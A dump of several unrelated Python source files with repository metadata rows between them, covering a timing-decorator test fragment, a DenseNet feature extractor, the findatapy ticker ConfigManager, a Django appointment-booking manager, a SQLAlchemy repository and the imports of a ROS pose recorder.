class TestNotClassmethods(object):
def delay_method(self):
sleep(.02)
def test_static_method(self):
Clocked.initialize('test function and class decorators')
TestDecorators.TestStaticMethod.delay_method()
t = [i for i in Clocked.get('.*delay_method.*')]
self.assertEqual(1, len(t))
t = t[0]
self._assert(20-2, t.duration_milliseconds, 20+2)
# noinspection PyDocstring
@clocked
class TestStaticMethod(object):
@staticmethod
def delay_method():
sleep(.02)
| 27.454054 | 67 | 0.556803 |
795b9031e39178494c4ea916744b7f8b1cb05a3b | 1,738 | py | Python | extract.py | InvokerLiu/DenseNet-Tensorflow | 8e171eb3f14a46cc68cdebd3d4db92b1376af698 | [
"Apache-2.0"
] | 2 | 2019-05-07T03:34:27.000Z | 2019-05-07T03:37:43.000Z | extract.py | InvokerLiu/DenseNet-Tensorflow | 8e171eb3f14a46cc68cdebd3d4db92b1376af698 | [
"Apache-2.0"
] | null | null | null | extract.py | InvokerLiu/DenseNet-Tensorflow | 8e171eb3f14a46cc68cdebd3d4db92b1376af698 | [
"Apache-2.0"
] | null | null | null | #! /usr/bin/env python3
# coding=utf-8
# ================================================================
#
# Editor : PyCharm
# File name : extract.py
# Author : LiuBo
# Created date: 2019-05-09 09:52
# Description :
#
# ================================================================
from nets.DenseNet56 import DenseNet56
from nets.DenseNet48 import DenseNet48
from nets.DenseNet40 import DenseNet40
from nets.DenseNet32 import DenseNet32
from nets.DenseNet24 import DenseNet24
from nets.DenseNet16 import DenseNet16
from nets.DenseNet8 import DenseNet8
from Utils.FeatureExtractor import FeatureExtractor
import numpy
if __name__ == "__main__":
segmentation_scale = 90
input_size = 40
object_id = 31936
model = DenseNet40(train_summary_dir="summary/train/" + str(input_size),
test_summary_dir="summary/test/" + str(input_size), training=False)
original_file = "D:/DoLab/Research/Data/WV/WV10400.jpg"
window_set_file = "WindowSet/WV/" + str(segmentation_scale) + "/WindowSet" + str(input_size) + "Percent.txt"
result_file = "features/WV/" + str(segmentation_scale) + "/meanFeatures" + str(input_size) + ".txt"
checkpoint = "checkpoint/" + str(input_size)
deep_features_file = "features/WV/" + str(segmentation_scale) + "/" + \
str(object_id) + "_" + str(input_size) + ".tif"
aggregation_function = numpy.mean
extractor = FeatureExtractor(model)
extractor.extract_object_features_by_id(window_set_file, deep_features_file, checkpoint, original_file, object_id)
# extractor.extract_features(window_set_file, result_file, checkpoint, original_file, aggregation_function)
| 42.390244 | 119 | 0.649022 |
795b9092659ad7fbba35b21bf555895e1b375519 | 14,208 | py | Python | .venv/lib/python3.8/site-packages/findatapy/util/configmanager.py | eo1989/VectorBTanalysis | bea3deaf2ee3fc114b308146f2af3e4f35f70197 | [
"MIT"
] | null | null | null | .venv/lib/python3.8/site-packages/findatapy/util/configmanager.py | eo1989/VectorBTanalysis | bea3deaf2ee3fc114b308146f2af3e4f35f70197 | [
"MIT"
] | null | null | null | .venv/lib/python3.8/site-packages/findatapy/util/configmanager.py | eo1989/VectorBTanalysis | bea3deaf2ee3fc114b308146f2af3e4f35f70197 | [
"MIT"
] | null | null | null | __author__ = 'saeedamen' # Saeed Amen
#
# Copyright 2016 Cuemacro
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and limitations under the License.
#
import csv
from findatapy.util.dataconstants import DataConstants
from findatapy.util.singleton import Singleton
from findatapy.util.loggermanager import LoggerManager
from dateutil.parser import parse
import re
import threading
class ConfigManager(object):
"""Functions for converting between vendor tickers and findatapy tickers (and vice-versa).
"""
__metaclass__ = Singleton
# tickers and fields
_dict_time_series_tickers_list_library_to_vendor = {}
_dict_time_series_tickers_list_vendor_to_library = {}
_dict_time_series_fields_list_vendor_to_library = {}
_dict_time_series_fields_list_library_to_vendor = {}
# store expiry date
_dict_time_series_ticker_expiry_date_library_to_library = {}
# store categories -> fields
_dict_time_series_category_fields_library_to_library = {}
_dict_time_series_category_startdate_library_to_library = {}
_dict_time_series_category_tickers_library_to_library = {}
# store categories ->
_dict_time_series_tickers_list_library = {}
__lock = threading.Lock()
__instance = None
def __init__(self, *args, **kwargs):
pass
def get_instance(cls):
if not ConfigManager.__instance:
with ConfigManager.__lock:
if not ConfigManager.__instance:
ConfigManager.__instance = super(ConfigManager,cls).__new__(ConfigManager)
ConfigManager.__instance.populate_time_series_dictionaries()
return ConfigManager.__instance
### time series ticker manipulators
@staticmethod
def populate_time_series_dictionaries():
# there are several CSV files which contain data on the tickers
# time_series_tickers_list - contains every ticker (findatapy tickers => vendor tickers)
# category, source, freq, ticker, cut, fields, sourceticker (from your data provider)
# eg. fx / bloomberg / daily / EURUSD / TOK / close,open,high,low / EURUSD CMPT Curncy
# time_series_fields_list - translate findatapy field name to vendor field names
# findatapy fields => vendor fields
# source, field, sourcefield
# time_series_categories_fields - for each category specific generic properties
# category, freq, source, fields, startdate
# eg. fx / daily / bloomberg / close,high,low,open / 01-Jan-70
# eg. bloomberg / close / PX_LAST
## populate tickers list (allow for multiple files)
time_series_tickers_list_file = DataConstants().time_series_tickers_list.split(';')
import os
for tickers_list_file in time_series_tickers_list_file:
if os.path.isfile(tickers_list_file):
reader = csv.DictReader(open(tickers_list_file))
for line in reader:
category = line["category"]
source = line["source"]
freq_list = line["freq"].split(',')
if isinstance(freq_list, str):
freq_list = [freq_list]
for freq in freq_list:
ticker = line["ticker"]
cut = line["cut"]
sourceticker = line["sourceticker"]
expiry = None
try:
expiry = line['expiry']
except:
pass
if category != "":
# print("stop" + category + '.' +
# source + '.' +
# freq + '.' +
# cut + '.' +
# ticker)
# conversion from library ticker to vendor sourceticker
ConfigManager._dict_time_series_tickers_list_library_to_vendor[category + '.' +
source + '.' +
freq + '.' +
cut + '.' +
ticker] = sourceticker
try:
if expiry != '':
expiry = parse(expiry)
else: expiry = None
except:
pass
# conversion from library ticker to library expiry date
ConfigManager._dict_time_series_ticker_expiry_date_library_to_library[
source + '.' +
ticker] = expiry
# conversion from vendor sourceticker to library ticker
ConfigManager._dict_time_series_tickers_list_vendor_to_library[source + '.' + sourceticker] = ticker
# library of tickers by category
key = category + '.' + source + '.' + freq + '.' + cut
if key in ConfigManager._dict_time_series_category_tickers_library_to_library:
ConfigManager._dict_time_series_category_tickers_library_to_library[key].append(ticker)
else:
ConfigManager._dict_time_series_category_tickers_library_to_library[key] = [ticker]
## populate fields conversions
reader = csv.DictReader(open(DataConstants().time_series_fields_list))
for line in reader:
source = line["source"]
field = line["field"]
sourcefield = line["sourcefield"]
# conversion from vendor sourcefield to library field
ConfigManager._dict_time_series_fields_list_vendor_to_library[source + '.' + sourcefield] = field
# conversion from library ticker to vendor sourcefield
ConfigManager._dict_time_series_fields_list_library_to_vendor[source + '.' + field] = sourcefield
## populate categories field list
reader = csv.DictReader(open(DataConstants().time_series_categories_fields))
for line in reader:
category = line["category"]
source = line["source"]
freq = line["freq"]
cut = line["cut"]
fields = line["fields"].split(',') # can have multiple fields
startdate = line["startdate"]
if category != "":
# conversion from library category to library fields list
ConfigManager._dict_time_series_category_fields_library_to_library[
category + '.' + source + '.' + freq + '.' + cut] = fields
# conversion from library category to library startdate
ConfigManager._dict_time_series_category_startdate_library_to_library[
category + '.' + source + '.' + freq + '.' + cut] = parse(startdate).date()
@staticmethod
def get_categories_from_fields():
return ConfigManager._dict_time_series_category_fields_library_to_library.keys()
@staticmethod
def get_categories_from_tickers():
return ConfigManager._dict_time_series_category_tickers_library_to_library.keys()
@staticmethod
def get_categories_from_tickers_selective_filter(filter):
initial_list = ConfigManager._dict_time_series_category_tickers_library_to_library.keys()
filtered_list = []
for category_desc in initial_list:
split_cat = category_desc.split('.')
category = split_cat[0]
source = split_cat[1]
freq = split_cat[2]
cut = split_cat[3]
if filter in category:
filtered_list.append(category_desc)
return filtered_list
@staticmethod
def get_potential_caches_from_tickers():
all_categories = ConfigManager._dict_time_series_category_tickers_library_to_library.keys()
expanded_category_list = []
for sing in all_categories:
split_sing = sing.split(".")
category = split_sing[0]
source = split_sing[1]
freq = split_sing[2]
cut = split_sing[3]
if(freq == 'intraday'):
intraday_tickers = ConfigManager().get_tickers_list_for_category(category, source, freq, cut)
for intraday in intraday_tickers:
expanded_category_list.append(category + '.' + source + '.' + freq +
'.' + cut + '.' + intraday)
else:
expanded_category_list.append(category + '.' + source + '.' + freq +
'.' + cut)
return expanded_category_list
@staticmethod
def get_fields_list_for_category(category, source, freq, cut):
return ConfigManager._dict_time_series_category_fields_library_to_library[
category + '.' + source + '.' + freq + '.' + cut]
@staticmethod
def get_startdate_for_category(category, source, freq, cut):
return ConfigManager._dict_time_series_category_startdate_library_to_library[
category + '.' + source + '.' + freq + '.' + cut]
@staticmethod
def get_expiry_for_ticker(source, ticker):
return ConfigManager._dict_time_series_ticker_expiry_date_library_to_library[
source + '.' + ticker]
@staticmethod
def get_filtered_tickers_list_for_category(category, source, freq, cut, filter):
tickers = ConfigManager._dict_time_series_category_tickers_library_to_library[
category + '.' + source + '.' + freq + '.' + cut]
filtered_tickers = []
for tick in tickers:
if re.search(filter, tick):
filtered_tickers.append(tick)
return filtered_tickers
@staticmethod
def get_tickers_list_for_category(category, source, freq, cut):
x = ConfigManager._dict_time_series_category_tickers_library_to_library[
category + '.' + source + '.' + freq + '.' + cut]
return x
@staticmethod
def convert_library_to_vendor_ticker(category, source, freq, cut, ticker):
return ConfigManager._dict_time_series_tickers_list_library_to_vendor[
category + '.' + source + '.'+ freq + '.' + cut + '.' + ticker]
@staticmethod
def convert_vendor_to_library_ticker(source, sourceticker):
return ConfigManager._dict_time_series_tickers_list_vendor_to_library[
source + '.' + sourceticker]
@staticmethod
def convert_vendor_to_library_field(source, sourcefield):
return ConfigManager._dict_time_series_fields_list_vendor_to_library[
source + '.' + sourcefield]
@staticmethod
def convert_library_to_vendor_field(source, field):
return ConfigManager._dict_time_series_fields_list_library_to_vendor[
source + '.' + field]
## test function
if __name__ == '__main__':
logger = LoggerManager().getLogger(__name__)
categories = ConfigManager().get_categories_from_fields()
logger.info("Categories from fields list")
print(categories)
categories = ConfigManager().get_categories_from_tickers()
logger.info("Categories from tickers list")
print(categories)
filter = 'events'
categories_filtered = ConfigManager().get_categories_from_tickers_selective_filter(filter)
logger.info("Categories from tickers list, filtered by events")
print(categories_filtered)
logger.info("For each category, print all tickers and fields")
for sing in categories:
split_sing = sing.split(".")
category = split_sing[0]
source = split_sing[1]
freq = split_sing[2]
cut = split_sing[3]
logger.info("tickers for " + sing)
tickers = ConfigManager().get_tickers_list_for_category(category, source, freq, cut)
print(tickers)
logger.info("fields for " + sing)
fields = ConfigManager().get_fields_list_for_category(category, source, freq, cut)
print(fields)
# test the various converter mechanisms
output = ConfigManager().convert_library_to_vendor_ticker(
category='fx',source='bloomberg', freq='daily', cut='TOK', ticker='USDJPY')
print(output)
output = ConfigManager().convert_vendor_to_library_ticker(
source='bloomberg', sourceticker='EURUSD CMPT Curncy')
print(output)
output = ConfigManager().convert_vendor_to_library_field(
source='bloomberg', sourcefield='PX_LAST')
print(output)
output = ConfigManager().convert_library_to_vendor_field(
source='bloomberg', field='close')
print(output)
x = 5
| 39.798319 | 129 | 0.578407 |
795b921295d4eaedad3a19761d118d03b72217e5 | 26,819 | py | Python | booking/managers.py | mattmc318/Pharmasseuse | aed9e7c40ada7ac1d4e6f080e05ba96fda0ea53f | [
"MIT"
] | null | null | null | booking/managers.py | mattmc318/Pharmasseuse | aed9e7c40ada7ac1d4e6f080e05ba96fda0ea53f | [
"MIT"
] | 1 | 2019-06-25T01:24:05.000Z | 2019-06-27T21:08:41.000Z | booking/managers.py | mattmc318/Pharmasseuse | aed9e7c40ada7ac1d4e6f080e05ba96fda0ea53f | [
"MIT"
] | null | null | null | import pytz
import sys
from django.db import models
from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned
from datetime import date, datetime, timedelta
from dateutil.relativedelta import relativedelta
from pharmasseuse.settings import TIME_ZONE
tz = pytz.timezone(TIME_ZONE)
class AppointmentManager(models.Manager):
def index(self, request):
from users.models import Profile
from booking.models import Appointment
profile = Profile.objects.get(user__pk=request.session['id']) \
if 'id' in request.session else None
today = datetime.now(tz).replace(hour=0, minute=0, second=0, microsecond=0)
appts = Appointment.objects.filter(
date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1),
profile__isnull=True,
black_out=False,
).order_by('date_start')
try:
date_begin = appts[0].date_start
date_begin = date_begin.astimezone(tz)
date_begin = date_begin.replace(hour=0, minute=0, second=0, microsecond=0)
except IndexError:
date_begin = today
prev_appt = Appointment.objects.filter(
date_start__lt=date_begin.astimezone(pytz.utc),
date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1),
profile__isnull=True,
black_out=False,
).order_by('-date_start').first()
next_appt = Appointment.objects \
.filter(
date_start__gte=date_begin.astimezone(pytz.utc) + timedelta(days=1),
profile__isnull=True,
black_out=False,
).filter(date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1)) \
.order_by('date_start').first()
errors = []
try:
prev = prev_appt.date_start
except AttributeError:
prev = date_begin - timedelta(days=1)
try:
next = next_appt.date_start
except AttributeError:
next = date_begin + timedelta(days=1)
return (True, {
'date': date_begin,
'prev': prev,
'next': next,
'profile': profile,
})
def create_appointment(self, date_start, date_end):
from booking.models import Appointment
try:
appt = Appointment.objects.get(
date_start=date_start,
date_end=date_end,
)
return (True, appt)
except ObjectDoesNotExist:
pass
try:
appt = Appointment.objects.create(
profile=None,
date_start=date_start,
date_end=date_end,
black_out=False,
)
except Exception as exception:
return (False, exception)
return (True, appt)
def create_appointments(self, date, verbose=False):
from booking.models import Appointment
tz = pytz.timezone(TIME_ZONE)
def toUTC(dt):
return tz.normalize(tz.localize(dt)).astimezone(pytz.utc)
def appointments(times):
for pair in times:
hour_start, minute_start = pair[0]
hour_end, minute_end = pair[1]
date_start = toUTC(datetime(
date.year,
date.month,
date.day,
hour_start,
minute_start,
))
date_end = toUTC(datetime(
date.year,
date.month,
date.day,
hour_end,
minute_end,
))
valid, response = self.create_appointment(date_start, date_end)
if not valid:
raise response
if verbose:
print('%s %s' % (response.date_start, response.date_end))
def weekend():
appointments([
[ (8, 0), (8, 50)], # 8am
[ (9, 0), (9, 50)], # 9am
[(10, 0), (10, 50)], # 10am
[(11, 0), (11, 50)], # 11am
[(13, 0), (13, 50)], # 1pm
[(14, 0), (14, 50)], # 2pm
[(15, 0), (15, 50)], # 3pm
[(17, 0), (17, 50)], # 5pm
[(18, 0), (18, 50)], # 6pm
[(19, 0), (19, 50)], # 7pm
])
def weekday():
appointments([
[(17, 0), (17, 50)], # 5pm
[(18, 0), (18, 50)], # 6pm
[(19, 0), (19, 50)], # 7pm
])
options = {
0: weekday,
1: weekday,
2: weekday,
3: weekday,
4: weekday,
5: weekend,
6: weekend,
}
try:
options[date.weekday()]()
except Exception as exception:
return (False, exception)
return (True, None)
def date_picker(self, request):
from booking.models import Appointment
today = datetime.now(tz)
year = int(request.GET.get('year', today.year))
month = int(request.GET.get('month', today.month))
date = first_of_month = datetime(year, month, 1, tzinfo=tz)
calendar = []
while date.weekday() != 6:
date = date - timedelta(days=1)
for _ in range(42):
appts = Appointment.objects.filter(
date_start__date=date,
profile__isnull=True,
black_out=False,
)
calendar.append({
'date': date,
'active': \
date > today and \
date.month == first_of_month.month and \
len(appts) > 0,
})
date = date + timedelta(days=1)
return {
'date': first_of_month,
'calendar': calendar,
'prev': first_of_month + relativedelta(months=-1),
'next': first_of_month + relativedelta(months=+1),
}
def day(self, request, admin=False):
from booking.models import Appointment
today = datetime.now(tz).replace(
hour=0, minute=0, second=0, microsecond=0)
tomorrow = today + timedelta(days=1)
if admin:
try:
day = datetime(
int(request.POST.get('year')),
int(request.POST.get('month')),
int(request.POST.get('day')),
0, 0, 0, 0,
)
except TypeError:
return (False, None)
else:
try:
day = datetime(
int(request.GET.get('year')),
int(request.GET.get('month')),
int(request.GET.get('day')),
0, 0, 0, 0,
)
except TypeError:
return (False, None)
after_change = day + timedelta(hours=3)
day = tz.localize(day)
after_change = tz.localize(after_change)
spring_forward = day.tzinfo._dst.seconds < after_change.tzinfo._dst.seconds
fall_back = day.tzinfo._dst.seconds > after_change.tzinfo._dst.seconds
times = []
if spring_forward:
for i in range(2):
times.append({
'hour': '12' if i % 12 == 0 else str(i % 12),
'minute': '00',
'ampm': 'a.m.' if i < 12 else 'p.m.',
})
for i in range(3, 24):
times.append({
'hour': '12' if i % 12 == 0 else str(i % 12),
'minute': '00',
'ampm': 'a.m.' if i < 12 else 'p.m.',
})
elif fall_back:
for i in range(2):
times.append({
'hour': '12' if i % 12 == 0 else str(i % 12),
'minute': '00',
'ampm': 'a.m.' if i < 12 else 'p.m.',
})
times.append({
'hour': 1,
'minute': '00',
'ampm': 'a.m.' if i < 12 else 'p.m.',
})
for i in range(2, 24):
times.append({
'hour': '12' if i % 12 == 0 else str(i % 12),
'minute': '00',
'ampm': 'a.m.' if i < 12 else 'p.m.',
})
else:
for i in range(24):
times.append({
'hour': '12' if i % 12 == 0 else str(i % 12),
'minute': '00',
'ampm': 'a.m.' if i < 12 else 'p.m.',
})
if admin:
appts = Appointment.objects.filter(
date_start__gte=day.astimezone(pytz.utc),
date_start__lt=day.astimezone(pytz.utc) + timedelta(days=1),
profile__isnull=True,
).filter(date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1)) \
.order_by('date_start')
else:
appts = Appointment.objects.filter(
date_start__gte=day.astimezone(pytz.utc),
date_start__lt=day.astimezone(pytz.utc) + timedelta(days=1),
profile__isnull=True,
black_out=False,
).filter(date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1)) \
.order_by('date_start')
slots = []
for appt in appts:
date_start = appt.date_start
date_end = appt.date_end
date_start = date_start.astimezone(tz)
date_end = date_end.astimezone(tz)
ampm_start = date_start.strftime('%p')
ampm_end = date_end.strftime('%p')
if ampm_start == 'AM':
ampm_start = 'a.m.'
elif ampm_start == 'PM':
ampm_start = 'p.m.'
if ampm_end == 'AM':
ampm_end = 'a.m.'
elif ampm_end == 'PM':
ampm_end = 'p.m.'
hour = date_start.astimezone(tz).hour
if spring_forward and hour >= 2:
hour = hour - 1
if fall_back and hour >= 2:
hour = hour + 1
slots.append({
'hour': hour,
'id': appt.id,
'start': '%d:%02d %s' % (
date_start.hour % 12,
date_start.minute,
ampm_start,
),
'end': '%d:%02d %s' % (
date_end.hour % 12,
date_end.minute,
ampm_end,
),
'black_out': appt.black_out,
})
return (True, {
'times': times,
'slots': slots,
})
def prev(self, request, admin=False):
from booking.models import Appointment
today = datetime.now(tz).replace(
hour=0, minute=0, second=0, microsecond=0)
if admin:
try:
day = datetime(
int(request.POST.get('year')),
int(request.POST.get('month')),
int(request.POST.get('day')),
0, 0, 0, 0,
)
day = tz.localize(day)
except TypeError:
return (False, None)
appts = Appointment.objects \
.filter(
date_start__gte=day.astimezone(pytz.utc) + timedelta(days=1),
profile__isnull=True,
).filter(date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1)) \
.order_by('date_start')
else:
try:
day = datetime(
int(request.GET.get('year')),
int(request.GET.get('month')),
int(request.GET.get('day')),
0, 0, 0, 0,
)
day = tz.localize(day)
except TypeError:
return (False, None)
appts = Appointment.objects \
.filter(
date_start__gte=day.astimezone(pytz.utc) + timedelta(days=1),
profile__isnull=True,
black_out=False,
).filter(date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1)) \
.order_by('date_start')
if len(appts) > 0:
return (True, {
'exists': True,
'date': {
'year': appts[0].date_start.astimezone(tz).year,
'month': appts[0].date_start.astimezone(tz).month,
'day': appts[0].date_start.astimezone(tz).day,
}
})
else:
return (True, {'exists': False})
def next(self, request, admin=False):
from booking.models import Appointment
today = datetime.now(tz).replace(
hour=0, minute=0, second=0, microsecond=0)
if admin:
try:
day = datetime(
int(request.POST.get('year')),
int(request.POST.get('month')),
int(request.POST.get('day')),
0, 0, 0, 0,
)
day = tz.localize(day)
except TypeError:
return (False, None)
appts = Appointment.objects \
.filter(
date_start__gte=day.astimezone(pytz.utc) + timedelta(days=1),
profile__isnull=True,
).filter(date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1)) \
.order_by('date_start')
else:
try:
day = datetime(
int(request.GET.get('year')),
int(request.GET.get('month')),
int(request.GET.get('day')),
0, 0, 0, 0,
)
day = tz.localize(day)
except TypeError:
return (False, None)
appts = Appointment.objects \
.filter(
date_start__gte=day.astimezone(pytz.utc) + timedelta(days=1),
profile__isnull=True,
black_out=False,
).filter(date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1)) \
.order_by('date_start')
if len(appts) > 0:
return (True, {
'exists': True,
'date': {
'year': appts[0].date_start.astimezone(tz).year,
'month': appts[0].date_start.astimezone(tz).month,
'day': appts[0].date_start.astimezone(tz).day,
}
})
else:
return (True, {'exists': False})
def submit(self, request):
from users.models import Profile
from .models import Appointment
user_id = int(request.session.get('id', 0))
profile_id = int(request.POST.get('profile-id', 0))
appointment_id = request.POST.get('appointment-id')
massage = request.POST.get('massage')
try:
profile = Profile.objects.get(pk=profile_id)
appts = Appointment.objects.filter(
profile=profile,
date_end__gt=datetime.now(pytz.utc),
black_out=False,
)
except Exception as exception:
return (False, [
'There was an error booking your appointment.',
exception,
])
if len(appts) == 0:
appt = Appointment.objects.get(pk=appointment_id)
appt.profile = profile
appt.massage = massage if massage != '' else None
appt.save()
else:
return (False, ['You may only book one appointment at a time.'])
name = 'your' if user_id == profile_id \
else '%s %s\'s' % (profile.user.first_name, profile.user.last_name)
message = 'You have successfully scheduled %s appointment.' % name
return (True, message)
def cancel_appointment(self, request):
from users.models import Profile
from .models import Appointment
user_id = int(request.session.get('id', 0))
client_id = int(request.POST.get('profile-id', 0))
today = datetime.now(tz).replace(hour=0, minute=0, second=0, microsecond=0)
try:
profile = Profile.objects.get(pk=client_id)
appt = Appointment.objects.get(
profile__pk=client_id,
date_start__gt=today.astimezone(pytz.utc) + timedelta(days=1),
black_out=False,
)
appt.profile = None
appt.massage = None
appt.save()
except Exception as exception:
return (False, [
'There was an error cancelling the appointment.',
exception,
])
name = 'your' if user_id == client_id \
else '%s %s\'s' % (profile.user.first_name, profile.user.last_name)
message = 'You have successfully cancelled %s appointment.' % name
return (True, message)
def reschedule(self, request):
from users.models import Profile
from booking.models import Appointment
errors = []
user_id = int(request.session.get('id', 0))
client_id = int(request.session.get('client-id', 0))
if user_id == 0:
errors.append(
'There was an error retrieving your profile. Please sign in.')
if client_id == 0:
errors.append(
'There was an error retrieving the client\'s profile.')
user_profile = Profile.objects.get(user__pk=user_id) \
if 'id' in request.session else None
client_profile = Profile.objects.get(user__pk=client_id) \
if 'client-id' in request.session else None
today = datetime.now(tz).replace(hour=0, minute=0, second=0, microsecond=0)
appts = Appointment.objects.filter(
date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1),
profile__isnull=True,
black_out=False,
).order_by('date_start')
date_begin = appts[0].date_start
date_begin = date_begin.astimezone(tz)
date_begin = date_begin.replace(hour=0, minute=0, second=0, microsecond=0)
prev_appts = Appointment.objects.filter(
date_start__lt=date_begin.astimezone(pytz.utc),
date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1),
profile__isnull=True,
black_out=False,
).order_by('-date_start')
next_appts = Appointment.objects \
.filter(
date_start__gte=date_begin.astimezone(pytz.utc) + timedelta(days=1),
profile__isnull=True,
black_out=False,
).filter(date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1)) \
.order_by('date_start')
try:
prev = prev_appts[0].date_start
except IndexError:
prev = date_begin - timedelta(days=1)
except Exception as exception:
errors.append('There was an error retrieving the previous day.')
errors.append(exception)
try:
next = next_appts[0].date_start
except IndexError:
next = date_begin + timedelta(days=1)
except Exception as exception:
errors.append('There was an error retrieving the next day.')
errors.append(exception)
if errors:
return (False, errors)
name = 'your' if user_id == client_id \
else '%s %s\'s' % (
client_profile.user.first_name,
client_profile.user.last_name,
)
return (True, {
'date': date_begin,
'prev': prev,
'next': next,
'profile': user_profile,
'client_profile': client_profile,
'name': name,
})
def reschedule_form(self, request):
profile_id = int(request.POST.get('profile-id', 0))
if profile_id == 0:
return (False, ['There was an error retrieving the client\'s profile.'])
return (True, profile_id)
def reschedule_submit(self, request):
from users.models import Profile
from booking.models import Appointment
user_id = int(request.session.get('id', 0))
client_id = int(request.session.get('client-id', 0))
appt_id = int(request.POST.get('appointment-id', 0))
profile = Profile.objects.get(user__pk=client_id) \
if 'client-id' in request.session else None
if profile == None:
return (False, ['There was an error retrieving the client\'s profile.'])
try:
old_appt = Appointment.objects.get(
profile=profile,
date_start__gt=datetime.now(tz).astimezone(pytz.utc),
black_out=False,
)
except Appointment.DoesNotExist:
return (False, [
'The specified user does not have an appointment. ' +
'Please create one by clicking the \'Booking\' tab.',
])
except MultipleObjectsReturned:
return (False, [
'The specified user has multiple appointments scheduled. ' +
'Please cancel all appointments and create a new one.',
])
try:
new_appt = Appointment.objects.get(pk=appt_id)
except Appointment.DoesNotExist:
return (False, [
'The specified appointment does not exist.',
])
except MultipleObjectsReturned:
return (False, [
'The specified user has multiple appointments scheduled. ' +
'Please cancel all appointments and create a new one.',
])
new_appt.massage = old_appt.massage
old_appt.massage = None
old_appt.profile = None
new_appt.profile = profile
old_appt.save()
new_appt.save()
name = 'your' if user_id == client_id \
else '%s %s\'s' % (profile.user.first_name, profile.user.last_name)
message = 'You have successfully rescheduled %s appointment.' % name
return (True, message)
def black_out_appointment(self, request):
from booking.models import Appointment
try:
id = int(request.POST.get('id'))
except TypeError:
return False
appt = Appointment.objects.get(pk=id)
appt.black_out = not appt.black_out
appt.save()
return True
def black_out_date(self, request):
from booking.models import Appointment
try:
day = datetime(
int(request.POST.get('year')),
int(request.POST.get('month')),
int(request.POST.get('day')),
0, 0, 0, 0,
)
except TypeError:
return False
day = tz.localize(day)
day = day.astimezone(pytz.utc)
appts = Appointment.objects.filter(
date_start__year=day.year,
date_start__month=day.month,
date_start__day=day.day,
profile=None,
black_out=False,
)
if len(appts) == 0:
appts = Appointment.objects.filter(
date_start__year=day.year,
date_start__month=day.month,
date_start__day=day.day,
profile=None,
black_out=True,
)
if len(appts) == 0:
valid, response = Appointment.objects.create_appointments(day)
if not valid:
raise response
else:
for appt in appts:
appt.black_out = False
appt.save()
else:
for appt in appts:
appt.black_out = True
appt.save()
return True
def add_appointment(self, request):
from users.models import Profile
from booking.models import Appointment
profile_id = int(request.POST.get('active-id', 0))
if profile_id:
profile = Profile.objects.get(user__pk=profile_id)
else:
valid, response = Profile.objects.add_profile(request)
if not valid:
return (False, response)
profile = response
today = datetime.now(tz).replace(hour=0, minute=0, second=0, microsecond=0)
appts = Appointment.objects.filter(
date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1),
profile__isnull=True,
black_out=False,
).order_by('date_start')
try:
date_begin = appts[0].date_start
date_begin = date_begin.astimezone(tz)
date_begin = date_begin.replace(hour=0, minute=0, second=0, microsecond=0)
except IndexError:
date_begin = today
prev_appts = Appointment.objects.filter(
date_start__lt=date_begin.astimezone(pytz.utc),
date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1),
profile__isnull=True,
black_out=False,
).order_by('-date_start')
next_appts = Appointment.objects \
.filter(
date_start__gte=date_begin.astimezone(pytz.utc) + timedelta(days=1),
profile__isnull=True,
black_out=False,
).filter(date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1)) \
.order_by('date_start')
errors = []
try:
prev = prev_appts[0].date_start
except IndexError:
prev = date_begin - timedelta(days=1)
except Exception as exception:
errors.append('There was an error retrieving the previous day.')
errors.append(exception)
try:
next = next_appts[0].date_start
except IndexError:
next = date_begin + timedelta(days=1)
except Exception as exception:
errors.append('There was an error retrieving the next day.')
errors.append(exception)
if errors:
return (False, errors)
return (True, {
'date': date_begin,
'prev': prev,
'next': next,
'profile': profile,
})
| 32.157074 | 90 | 0.5033 |
795b923d6a54cbe3ac1846a4213245ecb72e7af9 | 620 | py | Python | service/repo.py | ppmadalin/py-patterns | ea898e0119c0cd746953c955152efa779fc72f14 | [
"MIT"
] | 4 | 2020-07-22T13:39:33.000Z | 2021-07-26T19:11:35.000Z | service/repo.py | madalinpopa/py-patterns | 795322225fba80d794fda8ac16c46c1fab210db2 | [
"MIT"
] | null | null | null | service/repo.py | madalinpopa/py-patterns | 795322225fba80d794fda8ac16c46c1fab210db2 | [
"MIT"
] | 2 | 2022-02-19T11:38:55.000Z | 2022-03-26T02:12:06.000Z | # coding: utf-8
# service/repo.py
import abc
from sqlalchemy.orm import Session
from model import Blog
class AbstractRepository(abc.ABC):
@abc.abstractmethod
def add(self, blog: Blog):
raise NotImplementedError
@abc.abstractmethod
def get(self, name: str) -> Blog:
raise NotImplementedError
class SqlRepository(AbstractRepository):
def __init__(self, session: Session):
self._session = session
def add(self, blog: Blog):
self._session.add(blog)
def get(self, name: str) -> Blog:
return self._session.query(Blog).filter_by(name=name).first()
| 20 | 69 | 0.680645 |
795b924b9d25ca292ad451bb12db68e50b22e422 | 2,644 | py | Python | pose_recorder.py | MikeFlanigan/CSCI-5922_Final_Proj | 9f4b8dc87ac2db46c02ee8a9409aea7deb477021 | [
"Unlicense"
] | null | null | null | pose_recorder.py | MikeFlanigan/CSCI-5922_Final_Proj | 9f4b8dc87ac2db46c02ee8a9409aea7deb477021 | [
"Unlicense"
] | null | null | null | pose_recorder.py | MikeFlanigan/CSCI-5922_Final_Proj | 9f4b8dc87ac2db46c02ee8a9409aea7deb477021 | [
"Unlicense"
] | null | null | null |
import numpy as np
from numpy import pi
from math import sin, cos
import rospy
from sensor_msgs.msg import LaserScan
